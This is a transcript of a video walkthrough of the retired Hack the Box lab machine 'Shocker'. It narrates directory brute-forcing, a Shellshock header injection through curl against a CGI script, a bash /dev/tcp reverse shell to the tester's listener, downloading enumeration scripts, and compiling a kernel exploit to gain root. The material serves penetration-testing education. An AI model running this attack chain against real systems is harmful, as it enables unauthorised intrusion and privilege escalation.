In this video we're going to go through another walkthrough. So I'm going to make a demonstration for a vulnerable machine that's on Hack the Box. So this machine is Shocker. So at the moment of this recording, Shocker is part of the retired machines. So it's over here. So from what I know, you are allowed to do write-ups or walkthroughs for retired machines, but you should not be doing write-ups for active machines, which from what I know is against the guidelines of Hack the Box. Anyway, so we have our so first things first, it was relatively easy to own this machine, and it took me little time, but I got stumbled upon for a while in reconnaissance. So I'm going to explain that in a bit. So we have our IP 10.10.10.56, and I gotta say that I kind of circumvented the process of owning this machine. So I didn't go all the way through enumeration and all that stuff. I just like blasted through. Once I got inside the server, I actually immediately escalated my privileges to root, but more about that in a minute. So 10.10.10.56, that's our target. So we have our info.txt, which is what I'm always doing. So for any kind of assessment, for any kind of cybersecurity assessment that I'm doing, I'm actually writing this, I'm actually writing everything down. So every step of the assessment and any kind of information that I get from the assessment is written down in just a simple notepad or simple leafpad file. And I have to say that this is always a very good practice, because it will help you create a report and hand that report to the ones that requested the assessment, so the ones that requested the security assessment from you, or even it would be useful even to you in later assessments. You could always come back at it and see if you could replicate some of the steps, or use some information from the report to build another assessment. So anyhow, the first thing that I always do is a simple nmap SV scan. So 10.10.10.56. And after I run this simple scan, I usually do a more thorough scan, which is, so let me write it down, nmap SV 10.10.10.56, followed by an nmap, so then an nmap -p, which is for all ports, -t5, which is aggressive. And if you want to run a stealthy scan, you should probably go a T0 or a different nmap scan, but this time we're not actually, we don't care about how much or how aggressive we are in terms of loudness of our scan. So I could also say -a, but we don't actually, it's not really necessary to specify that. -a, I guess it stands for aggressive. I'm not sure, but T5 is probably the highest level. So -p for all ports, or you could just say -p0 65,535, I guess, which is the number of all possible ports. But let's just say that. So -t5, and then our IP 10.10.10.56. We could output this, we could use OA and output it to like nmap, or to any kind of path we want to output it. or if we just run this, it will simply run in the window we have. So let's save this for now. So we see that we have an Apache server running. If we go to our web server, it says don't bug me. Okay. Now, as someone has specified in a previous video, we could just control U to see the source. So it's control plus U to see the source. And there isn't anything interesting in here. So don't bug me. We could keep this in mind. Next, what I did was to run a derb to HTTP 10.10.10.56 with the word list, user share word list, derb word lists, I guess, derb big.txt, and this took about a couple of minutes. So big.txt is 20,000 words long. Big.txt found so derb with big.txt, it found CGI bin, so the CGI bin directory. Okay, so knowing that we have the CGI bin and also the name of the box, which is Shocker, and we have the don't bug me over here, should probably ring some alarms. Anyhow, this is the point where I got a bit like delayed. So derb actually told me about the CGI bin, but I didn't take that into account, and I tried brute forcing directories with a bigger list, with a bigger word list. So I actually tried with directory list 2.3 medium.txt, I guess, and I didn't find anything. So that list is probably 200,000, I guess, or 80,000, I'm not really sure, 80 or 200,000 words long. And I didn't actually find anything. And it took, I don't know, maybe an hour to run it. So then I thought, okay, so if we have this CGI bin, and that's the moment when it kind of clicked. So we have the CGI bin directory. So I'll just leave it for, I don't know, maybe 1 or 2 more minutes. So we have the CGI bin directory, and the name of the box is Shocker, and we have the don't bug me over here. So this should probably tell us that it might have something to do with the very popular exploit that was revealed in, or the very popular vulnerability that was revealed in 2014, I guess, which is, as you may guess, the Shellshock vulnerability. And if you don't know about it, I'd recommend reading this presentation by Tudor Enake, which I guess is a Romanian fellow who emigrated or works for someone in the Emirates. Anyway, so this presentation at OWASP, Open Web Application, I don't know what, Open Web Application Security Project, explains the Shellshock vulnerability. So I'm gonna try to keep it short. So in short, the Shellshock has been standing around for, so this vulnerability has been standing around for more than, I guess, 20 years at the time that it was discovered. And it allows, if you have a web server with CGI enabled, it could allow for remote command execution. So that's when I thought, if we have the CGI bin, which was found by big.txt, and which I ignored thereafter, we could try looking for scripts inside CGI bin to see if we could get the remote command execution that I want. So at the moment, I thought of, let me try and run the same derb scan, but this time in the CGI bin directory and with the extension. So I want derb to look for .sh. So not only for directory names, but also for extensions. So whatever it scans for, it doubles the scan to sh. So whatever word is inside the big.txt, it will not only look for it as a directory, but also as an extension. So as you can see, extensions list is .sh. So this took probably maybe 15 minutes until I got after 15 minutes I got the CGI bin user, or yeah, I guess it was user.sh. Okay, so at this point I kind of felt that I'm lucky. So next, what I tried was to actually see if this is vulnerable to Shellshock. I could have simply just so we can see that it is forbidden, and if we go to user.sh, it'll probably want to download it, which is not what we want. We want to access it through something like, so we want to be able to modify the headers so that we can see if this is exploitable, and we could do that with either two of the most convenient options would be curl, and another one would be burp suite. So with the ultra popular burp, which I start to get familiar with. I hated it until a couple of weeks ago. Anyhow, so probably the most simple is using curl, and the first option is -v for verbose, I guess. Let's see, curl help -v is for verbose. Yeah, so curl -v, our path HTTP, we have 10.10.10.56. CGI bin, our user. Let me just make this a little bigger. So CGI user.sh, and we want to modify the headers. So here's where the actual exploit goes on. So it's custom ignored and we want to say echo. So over here, this is actually the Shellshock exploit, and then we echo. We could also say content type over here, text HTML, but it works if we simply echo, and then let's say bin cat etc password. I want to make sure that this looks good. Let's see. Yeah, so it works. So this is vulnerable to the Shellshock exploit. So once again, custom ignored echo bin cat etc password. So we have remote command execution. So as I wanted to circumvent the process, the first thing before getting a reverse shell, any kind of reverse shell, was to see what's inside the home directory. So I just did bin ls home, and we can see Shelly over here. let's just say ls minus al. So it's Shelly. Then inside Shelly, let's say, what's inside Shelly? We have our user flag. Let's just read that. So user.txt, and we modify the command. It's not ls, it's cat. And there's our user flag. Control Shift C. Paste it over here. So user, let's say Shelly, and our flag. And the next thing that I want to do was to try to get the simplest shell on the server. And you can do that directly through remote command execution, and you just call bin bash. This is probably one of the easiest reverse shells. -I dev tcp and my IP. So if config, my IP is 10.10.14.14, so 10.10.14.14, and the port, let's say 449, 0 greater than and 1. So before we run this, we should set up a netcat listener to that port. So nc-lvp 449, and then we run this. Okay, so looks like we have a shell on the server. That's UID or ID. Okay, and once I got here, I didn't actually look for anything but the name, DUNA -A, and when I saw 44096, I thought of a recent exploit, and I'm gonna talk about that in a minute. But first, let's see how you would do it conventionally when you run an assessment, and you want to gather as much information as possible. So I'm gonna cd into temp, and I'm also gonna run, so ls -a. I'm also gonna run, so I also have the bug.jpg. I looked inside it to see if there's some sort of anything hidden inside the image, like some sort of, I don't know, information hidden with EXIF tool or something like that, like steganography thing, which I don't like at the moment. So I simply run a python -m simple HTTP server on port 49, and I would get one or more of these files from there. So I would wget 10.10.14.14 port 49, lin enum.sh. Then I would get 10.10.14.14 lin priv.py. I would also get the exploit suggester. So wget 10.10.10.10.14.14.49 expl sugsh. So these will allow for in-depth reconnaissance of the target. Exploit suggester would actually suggest exploits based on the information it gets from the system. Lin enum and lin priv are two scripts. One of it is the Python, and one of it is bash, which all of you are probably familiar with. Anyhow, so what I did was to, as you can see, I also downloaded the 44298. So this is an exploit that's just been released last month, so in March. And I guess most Linux kernels before this version are exploitable. So what I did was to download it on my local machine. I didn't actually look if it has GCC or CC. It doesn't. So anyhow, it is on my machine and I compiled it. So GCC 44298.c minus 044298. So we have the compiled version of it, and this is somehow the version of my Kali is compatible with so the systems are compatible, which is why it allowed me to actually run it compiled on our target. So I got it 10.10.10.10.14.14 port 49, I guess, and 44298, but I already have it here. So first, before running it, I actually have to get out of this dirty shell, I would call it. So how do we do that? Using Python, but I'm not sure if it has Python or Python 3. So if we run Python 3, I guess it has the Python 3. Okay, so Python 3 C import PTI spawn. We're gonna get out of this shell, bin bash. Okay, so we're out of the shell, and this is the fun part and the easy part. So I'm gonna change mode plus X to 44298, and right now I'm Shelly, and I'm just gonna run this one. Easy as that. Who we are, root. ID, root. cd to root, ls-al, cat root.txt, and there's our root flag. So root, Control V, and that's done. My reports are usually like, I don't know, maybe 50 or 60 line long. At least 50 or 60 lines long. So this one was really easy, as you can see. So right now we are root and we can do anything on this box. What I want to point out is that, I don't know, maybe this box would have been really interesting if I would try to I don't know, exploit it or escalate my privileges conventionally. Maybe I would have learned a lot, but I don't know. I'll also try other vectors of attack if I have time and if I'm interested in doing it with this box. What I want to point out is that when you have so powerful exploits, you should always check your system. If you're a network administrator, you should always check your system to see if you're vulnerable to these exploits and apply all the patches and all the updates necessary to kind of remove your vulnerability to that exploit. Anyhow, if you enjoyed this video, please give it a thumbs up and subscribe to the channel. And if you want to see more cybersecurity, penetration testing, and offensive security related videos, let me know in the comment sections below. Thank you for watching.